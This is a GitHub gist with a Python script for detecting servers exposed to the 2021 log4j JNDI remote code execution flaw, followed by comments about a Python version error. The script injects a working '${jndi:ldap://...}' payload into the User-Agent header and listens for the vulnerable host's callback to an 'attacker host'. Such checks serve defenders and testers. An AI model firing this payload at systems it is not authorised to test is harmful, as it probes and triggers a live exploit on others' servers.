Created
December 10, 2021 06:02
-
-
Save byt3bl33d3r/46661bc206d323e6770907d259e009b6 to your computer and use it in GitHub Desktop.
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (https://www.lunasec.io/docs/blog/log4j-zero-day/)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /usr/bin/env python3 | |
''' | |
Needs Requests (pip3 install requests) | |
Author: Marcello Salvati, Twitter: @byt3bl33d3r | |
License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License) | |
This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021. | |
WARNING: This script is extremely naive in a lot of ways cause it was put together in 15 min. See comments below. | |
References: | |
- https://www.lunasec.io/docs/blog/log4j-zero-day/ | |
- https://github.com/tangxiaofeng7/apache-log4j-poc | |
- https://github.com/apache/logging-log4j2/pull/608 | |
''' | |
import logging | |
import requests | |
import socket | |
import argparse | |
import threading | |
import time | |
handler = logging.StreamHandler() | |
handler.setFormatter( | |
logging.Formatter( | |
style="{", | |
fmt="[{name}:{filename}] {levelname} - {message}" | |
) | |
) | |
log = logging.getLogger("log4jscanner") | |
log.setLevel(logging.DEBUG) | |
log.addHandler(handler) | |
def tcp_server(attacker_host): | |
_, PORT = attacker_host.split(':') | |
HOST = '' | |
PORT = int(PORT) | |
log.debug(f"Starting server on 0.0.0.0:{PORT}") | |
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: | |
s.bind((HOST, PORT)) | |
s.listen() | |
conn, addr = s.accept() | |
with conn: | |
log.debug(f"Connected by {addr}. If this is the same host you attacked its most likely vulnerable") | |
while True: | |
data = conn.recv(1024) | |
if not data: break | |
print(data.hex()) | |
def main(): | |
parser = argparse.ArgumentParser() | |
parser.add_argument('url', help='target http url') | |
parser.add_argument('--attacker-host', type=str, dest='attacker_host', default='127.0.0.1:1389', help="attacker's host:port ") | |
parser.add_argument('--timeout', type=int, dest='timeout', default=10, help='timeout to start listening') | |
args = parser.parse_args() | |
server_thread = threading.Thread(target=tcp_server, args=(args.attacker_host,)) | |
server_thread.setDaemon(True) | |
server_thread.start() | |
time.sleep(2) | |
try: | |
""" | |
Due of the nature of the exploit, any HTTP field could be used to exploit a vulnerable machine (as long as it's being logged on the affected host) | |
Here we're just injecting the string in the User-Agent field. | |
""" | |
requests.get( | |
args.url, | |
headers={'User-Agent': f'${{jndi:ldap://{args.attacker_host}/exploit.class}}'}, | |
verify=False | |
) | |
except requests.exceptions.ConnectionError as e: | |
log.error(f"HTTP connection to target URL error: {e}") | |
log.debug(f"Waiting {args.timeout} seconds for a response") | |
time.sleep(args.timeout) | |
if __name__ == "__main__": | |
main() |
@boyke pip3 install requests
per line 4
Thanks, I took only the server part of your code and modified it to log to file. Pen-testers will make their own attacks as they go
I dont know why i got this error
File "log4j_checker.py", line 41
log.debug(f"Starting server on 0.0.0.0:9999")
how can we fix this and thank you 👍
The error you sent is strange since on line 41 there is no log output - it is on line 44. But my suspicion is, that you might be using a python version that does not support f-strings (<3.6).
See https://realpython.com/python-f-strings/ for details.
If so, try to upgrade or get a library that ports that functionality to python versions below 3.6 (I.e. https://github.com/asottile/future-fstrings)
All the best,
Michael
… On 24. Dec 2021, at 16:18, xqx ***@***.***> wrote:
***@***.*** commented on this gist.
I dont know why i got this error
File "log4j_checker.py", line 41
log.debug(f"Starting server on 0.0.0.0:9999")
how can we fix this and thank you 👍
—
Reply to this email directly, view it on GitHub, or unsubscribe.
Triage notifications on the go with GitHub Mobile for iOS or Android.
You are receiving this because you were mentioned.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Nice! Thanks!